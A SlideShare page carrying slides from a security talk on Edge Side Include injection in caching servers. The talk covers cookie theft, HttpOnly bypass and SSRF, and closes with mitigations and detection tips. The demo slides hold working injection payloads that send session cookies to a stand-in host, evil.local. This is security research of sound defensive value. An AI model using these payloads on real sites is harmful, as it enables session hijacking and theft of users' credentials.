SlideShare a Scribd company logo

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

Priyanka Aash
Priyanka Aash

When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks. The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking. Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.

Technology
1 of 50
Download to read offline
Edge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
Edge Side Includes (ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
ESI — Brief Overview
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
ESI — Brief Overview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
ESI Features & Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
ESI Features & Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
ESI — Include Network Flow (Cache MISS)
ESI — Include Network Flow (Cache MISS) ①/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html ②/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
ESI — Injection <p> City: <?= $_GET['city'] ?> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI Implementations — Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
DEMO 1 — Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
DEMO 1 Now we know... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
ESI Implementations — Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
DEMO 2 — Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
DEMO 2 Now we know... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
ESI — SSRF Flow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
ESI — Migration (by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
Questions? Detailed blogpost of our prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure

Recommended

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Access control list acl - permissions in linux
Access control list acl - permissions in linuxAccess control list acl - permissions in linux
Access control list acl - permissions in linuxSreenatha Reddy K R
 
Document Object Model ( DOM)
Document Object Model ( DOM)Document Object Model ( DOM)
Document Object Model ( DOM)Abdelouahed Abdou
 
Java entreprise edition et industrialisation du génie logiciel par m.youssfi
Java entreprise edition et industrialisation du génie logiciel par m.youssfiJava entreprise edition et industrialisation du génie logiciel par m.youssfi
Java entreprise edition et industrialisation du génie logiciel par m.youssfiENSET, Université Hassan II Casablanca
 
Maven et industrialisation du logiciel
Maven et industrialisation du logicielMaven et industrialisation du logiciel
Maven et industrialisation du logicielENSET, Université Hassan II Casablanca
 
L’hyperconvergence au cœur du Software-defined data center
L’hyperconvergence au cœur du Software-defined data centerL’hyperconvergence au cœur du Software-defined data center
L’hyperconvergence au cœur du Software-defined data centerColloqueRISQ
 
Support de cours Spring M.youssfi
Support de cours Spring M.youssfiSupport de cours Spring M.youssfi
Support de cours Spring M.youssfiENSET, Université Hassan II Casablanca
 

Recommended

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Access control list acl - permissions in linux
Access control list acl - permissions in linuxAccess control list acl - permissions in linux
Access control list acl - permissions in linuxSreenatha Reddy K R
 
Document Object Model ( DOM)
Document Object Model ( DOM)Document Object Model ( DOM)
Document Object Model ( DOM)Abdelouahed Abdou
 
Java entreprise edition et industrialisation du génie logiciel par m.youssfi
Java entreprise edition et industrialisation du génie logiciel par m.youssfiJava entreprise edition et industrialisation du génie logiciel par m.youssfi
Java entreprise edition et industrialisation du génie logiciel par m.youssfiENSET, Université Hassan II Casablanca
 
Maven et industrialisation du logiciel
Maven et industrialisation du logicielMaven et industrialisation du logiciel
Maven et industrialisation du logicielENSET, Université Hassan II Casablanca
 
L’hyperconvergence au cœur du Software-defined data center
L’hyperconvergence au cœur du Software-defined data centerL’hyperconvergence au cœur du Software-defined data center
L’hyperconvergence au cœur du Software-defined data centerColloqueRISQ
 
Support de cours Spring M.youssfi
Support de cours Spring M.youssfiSupport de cours Spring M.youssfi
Support de cours Spring M.youssfiENSET, Université Hassan II Casablanca
 
Sécurité des Applications Web avec Json Web Token (JWT)
Sécurité des Applications Web avec Json Web Token (JWT)Sécurité des Applications Web avec Json Web Token (JWT)
Sécurité des Applications Web avec Json Web Token (JWT)ENSET, Université Hassan II Casablanca
 
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3Ji-Woong Choi
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Alphorm.com Formation VirtualBox
Alphorm.com Formation VirtualBoxAlphorm.com Formation VirtualBox
Alphorm.com Formation VirtualBoxAlphorm
 
Jsf 110530152515-phpapp01
Jsf 110530152515-phpapp01Jsf 110530152515-phpapp01
Jsf 110530152515-phpapp01Eric Bourdet
 
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Sylvain Maret
 
Test
TestTest
Testskri_zakariya
 
[FR] Présentatation d'Ansible
[FR] Présentatation d'Ansible [FR] Présentatation d'Ansible
[FR] Présentatation d'Ansible Armand Guio
 
Support JEE Spring Inversion de Controle IOC et Spring MVC
Support JEE Spring Inversion de Controle IOC et Spring MVCSupport JEE Spring Inversion de Controle IOC et Spring MVC
Support JEE Spring Inversion de Controle IOC et Spring MVCENSET, Université Hassan II Casablanca
 
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017Netgate
 
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4 Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4 Khalid EDAIG
 
Chp5 - Sécurité des Services
Chp5 - Sécurité des ServicesChp5 - Sécurité des Services
Chp5 - Sécurité des ServicesLilia Sfaxi
 
Notes de cours et tp - Administation Systèmes
Notes de cours et tp - Administation Systèmes Notes de cours et tp - Administation Systèmes
Notes de cours et tp - Administation Systèmes Ikram Benabdelouahab
 
Présentation Exchange 2010
Présentation Exchange 2010Présentation Exchange 2010
Présentation Exchange 2010Majid CHADAD
 
What Is Php
What Is PhpWhat Is Php
What Is PhpAVC
 
Support du cours : Programmation Web 2
Support du cours : Programmation Web 2Support du cours : Programmation Web 2
Support du cours : Programmation Web 2Faycel Chaoua
 
Maven
MavenMaven
MavenMourad HASSINI
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 
cours-gratuit.com--id-4422.pdf
cours-gratuit.com--id-4422.pdfcours-gratuit.com--id-4422.pdf
cours-gratuit.com--id-4422.pdflhoussainebouganfou
 
Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it allCriciúma Dev
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis
 

More Related Content

What's hot

[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3Ji-Woong Choi
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Alphorm.com Formation VirtualBox
Alphorm.com Formation VirtualBoxAlphorm.com Formation VirtualBox
Alphorm.com Formation VirtualBoxAlphorm
 
Jsf 110530152515-phpapp01
Jsf 110530152515-phpapp01Jsf 110530152515-phpapp01
Jsf 110530152515-phpapp01Eric Bourdet
 
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Sylvain Maret
 
[FR] Présentatation d'Ansible
[FR] Présentatation d'Ansible [FR] Présentatation d'Ansible
[FR] Présentatation d'Ansible Armand Guio
 
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017Netgate
 
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4 Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4 Khalid EDAIG
 
Chp5 - Sécurité des Services
Chp5 - Sécurité des ServicesChp5 - Sécurité des Services
Chp5 - Sécurité des ServicesLilia Sfaxi
 
Notes de cours et tp - Administation Systèmes
Notes de cours et tp - Administation Systèmes Notes de cours et tp - Administation Systèmes
Notes de cours et tp - Administation Systèmes Ikram Benabdelouahab
 
Présentation Exchange 2010
Présentation Exchange 2010Présentation Exchange 2010
Présentation Exchange 2010Majid CHADAD
 
What Is Php
What Is PhpWhat Is Php
What Is PhpAVC
 
Support du cours : Programmation Web 2
Support du cours : Programmation Web 2Support du cours : Programmation Web 2
Support du cours : Programmation Web 2Faycel Chaoua
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 

What's hot (20)

Sécurité des Applications Web avec Json Web Token (JWT)
Sécurité des Applications Web avec Json Web Token (JWT)Sécurité des Applications Web avec Json Web Token (JWT)
Sécurité des Applications Web avec Json Web Token (JWT)
 
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3
[오픈소스컨설팅] 아파치톰캣 운영가이드 v1.3
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Alphorm.com Formation VirtualBox
Alphorm.com Formation VirtualBoxAlphorm.com Formation VirtualBox
Alphorm.com Formation VirtualBox
 
Jsf 110530152515-phpapp01
Jsf 110530152515-phpapp01Jsf 110530152515-phpapp01
Jsf 110530152515-phpapp01
 
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
 
Test
TestTest
Test
 
[FR] Présentatation d'Ansible
[FR] Présentatation d'Ansible [FR] Présentatation d'Ansible
[FR] Présentatation d'Ansible
 
Support JEE Spring Inversion de Controle IOC et Spring MVC
Support JEE Spring Inversion de Controle IOC et Spring MVCSupport JEE Spring Inversion de Controle IOC et Spring MVC
Support JEE Spring Inversion de Controle IOC et Spring MVC
 
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017
Server Load Balancing on pfSense 2.4 - pfSense Hangout July 2017
 
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4 Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
 
Chp5 - Sécurité des Services
Chp5 - Sécurité des ServicesChp5 - Sécurité des Services
Chp5 - Sécurité des Services
 
Notes de cours et tp - Administation Systèmes
Notes de cours et tp - Administation Systèmes Notes de cours et tp - Administation Systèmes
Notes de cours et tp - Administation Systèmes
 
Présentation Exchange 2010
Présentation Exchange 2010Présentation Exchange 2010
Présentation Exchange 2010
 
What Is Php
What Is PhpWhat Is Php
What Is Php
 
Support du cours : Programmation Web 2
Support du cours : Programmation Web 2Support du cours : Programmation Web 2
Support du cours : Programmation Web 2
 
Maven
MavenMaven
Maven
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 
cours-gratuit.com--id-4422.pdf
cours-gratuit.com--id-4422.pdfcours-gratuit.com--id-4422.pdf
cours-gratuit.com--id-4422.pdf
 

Similar to Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it allCriciúma Dev
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryTatsuhiko Miyagawa
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)Igor Bronovskyy
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.Josh Hillier
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Scalalable Language for a Scalable Web
Scalalable Language for a Scalable WebScalalable Language for a Scalable Web
Scalalable Language for a Scalable WebTimothy Perrett
 
HTML5: huh, what is it good for?
HTML5: huh, what is it good for?HTML5: huh, what is it good for?
HTML5: huh, what is it good for?Remy Sharp
 
May 2010 - RestEasy
May 2010 - RestEasyMay 2010 - RestEasy
May 2010 - RestEasyJBug Italy
 
Writing RESTful web services using Node.js
Writing RESTful web services using Node.jsWriting RESTful web services using Node.js
Writing RESTful web services using Node.jsFDConf
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 

Similar to Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking (20)

Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it all
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to now
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Nodejs.meetup
Nodejs.meetupNodejs.meetup
Nodejs.meetup
 
RESTEasy
RESTEasyRESTEasy
RESTEasy
 
Scalalable Language for a Scalable Web
Scalalable Language for a Scalable WebScalalable Language for a Scalable Web
Scalalable Language for a Scalable Web
 
HTML5: huh, what is it good for?
HTML5: huh, what is it good for?HTML5: huh, what is it good for?
HTML5: huh, what is it good for?
 
How Akamai Made ESI Testing Simpler
How Akamai Made ESI Testing SimplerHow Akamai Made ESI Testing Simpler
How Akamai Made ESI Testing Simpler
 
May 2010 - RestEasy
May 2010 - RestEasyMay 2010 - RestEasy
May 2010 - RestEasy
 
Writing RESTful web services using Node.js
Writing RESTful web services using Node.jsWriting RESTful web services using Node.js
Writing RESTful web services using Node.js
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Intro to PSGI and Plack
Intro to PSGI and PlackIntro to PSGI and Plack
Intro to PSGI and Plack
 
Webpack
Webpack Webpack
Webpack
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
